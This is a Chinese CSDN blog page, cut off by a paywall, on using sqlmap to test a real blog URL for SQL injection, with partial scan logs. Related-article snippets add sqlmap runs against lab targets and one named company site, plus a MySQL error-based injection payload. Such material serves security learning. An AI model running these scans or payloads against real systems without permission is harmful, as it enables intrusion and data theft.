info testing mysql_使用 sqlmap 进行 SQL 注入检测

最新推荐文章于 2024-07-13 15:36:01 发布
最新推荐文章于 2024-07-13 15:36:01 发布
阅读量747 收藏
点赞数
文章标签: info testing mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29384935/article/details/113645551
版权
本文介绍了通过sqlmap工具对URL进行SQL注入检测的过程,详细记录了sqlmap的运行日志,包括对GET参数'catalog'和'temp'的测试,虽然最终未发现可利用的注入漏洞,但展示了sqlmap的检测步骤和常用测试方法。
摘要由CSDN通过智能技术生成

最近在看《白帽子讲 Web 安全》,讲服务器端注入攻击时提到一个神器 sqlmap。

python sqlmap.py -u "https://my.oschina.net/lvyi/blog?catalog=423226&temp=1476090615355"

即可开始分析有没有 SQL 注入的可能。

[17:10:41] [INFO] GET parameter 'catalog' is dynamic

[17:10:42] [INFO] heuristic (basic) test shows that GET parameter 'catalog' might be injectable

[17:10:42] [INFO] testing for SQL injection on GET parameter 'catalog'

[17:10:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[17:11:00] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'

[17:11:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'

[17:11:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[17:11:24] [INFO] testing 'Microsoft SQL Server/Sybas

最低0.47元/天 解锁文章
赵劼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqlmap使用学习记录
https://goodlunatic.github.io/
04-17 1598
【GET注入】 -u进行注入测试 python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 --batch使用默认参数进行注入(东西较多) python sqlmap.py -u http://localhost/sqli-labs/Less-2/?id=1 --batch 用“”将URL包起来,对两个参数进行测试,若不加“”。默认测试第一个参数 python sqlmap.py -u "http://localhost/sqli-l
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 7971
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
Mybatis防止SQL注入
最新发布
Jc0803kevin的专栏
07-13 1086
防止SQL注入的中心思想就是参数化查询,将输入当作参数传递,而不是直接拼接到 SQL 语句中。常见的防止SQL注入的方式1、#{}2、3、[配置 SQL 注入过滤器](#配置 SQL 注入过滤器)
sqlmap超详细使用说明书
yzcn
10-31 1791
** sqlmap超详细使用说明书 ** http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时
sqlmap代码
qq_46648283的博客
05-20 6554
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
CTFhub---WebsiteManger
jiet07的博客
11-09 2186
思路 进入题目:刷新,图片会更新 新建标签页打开,有id参数 使用sqlmap 进行测试
SQL报错注入小结
热门推荐
lixiangminghate的专栏
05-13 1万+
sqli-labs的前4个实验(Lab1-Lab4)是基于SQL报错注入(Error-based injection)。什么是SQL报错注入?这是一种页面响应形式。响应过程如下:当用户在前台页面上输入检索内容时,后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。数据库将执行结果返回给后台。后台将数据库执行结果无加区别的显示到前台页面上。上面这句话中,我用了2个"无加区别"-...
info testing mysql_诺亚舟教育网SQL注入漏洞(涉及近170w用户信息)
weixin_39943442的博客
02-03 558
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutualconsent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers ...
sqlmap 注入oracle,使用 sqlmap 进行 SQL 注入检测
weixin_34915171的博客
04-13 1659
为什么80%的码农都做不了架构师?>>> 最近在看《白帽子讲 Web 安全》,讲服务器端注入攻击时提到一个神器 sqlmap。到 Github:sqlmap 下载工具,到目录下运行python sqlmap.py -u "https://my.oschina.net/lvyi/blog?catalog=423226&temp=1476090615355"即可开始分析有没有...
SQL注入漏洞之sqlmap自动注入
XZZbh的博客
09-19 446
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
burp爆破mysql_[技巧]使用Burpsuite辅助Sqlmap进行POST注入测试
weixin_28877505的博客
01-26 857
我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。1.浏览器打开目标地址http://testasp.vulnweb.com/Login.asp2.配置burp代理(127.0.0.1:8080)以拦截请求3.点击login表单的sub...
简单的sql注入之2WP
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
2019-2-17 dvwa学习-环境搭建和sql字符型注入(级别low)
weixin_42555985的博客
02-17 7368
因为要学习sqlmap,所以需要搭一个测试环境。 查了网上http://www.360doc.com/content/13/0614/22/11029609_292922372.shtml,打算搞个dvwa环境。 DVWA全称是Damn Vulnerable Web Application,它是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XS...
20200211作业
he1721360028的博客
02-11 3559
宽字节注入 第三十二关 当我们输入注入语句时:http://localhost/sqli-labs-master/Less-32/?id=1' 发现单引号被反斜杠给转译了,这样单引号就失去的闭合sql语句的用处了,所以我们要用%df来干掉反斜杠。 原因是urlencode(\') = %5c%27,我们在%5c%27前面添加%df,这样%df%5c就变成了運'这样%27也就是单引号...
1、SQL注入语句之Mysql(3)Error Based
daxi0ng的博客
08-05 816
1.exp()MySQL>=5.5.5 select * from products where pid=1 and exp(~(select * from(select user())a)); 1 and exp(~(select*from(select convert(concat(database(),0x7c,user(),0x7c,version())using lati...
Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4510
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值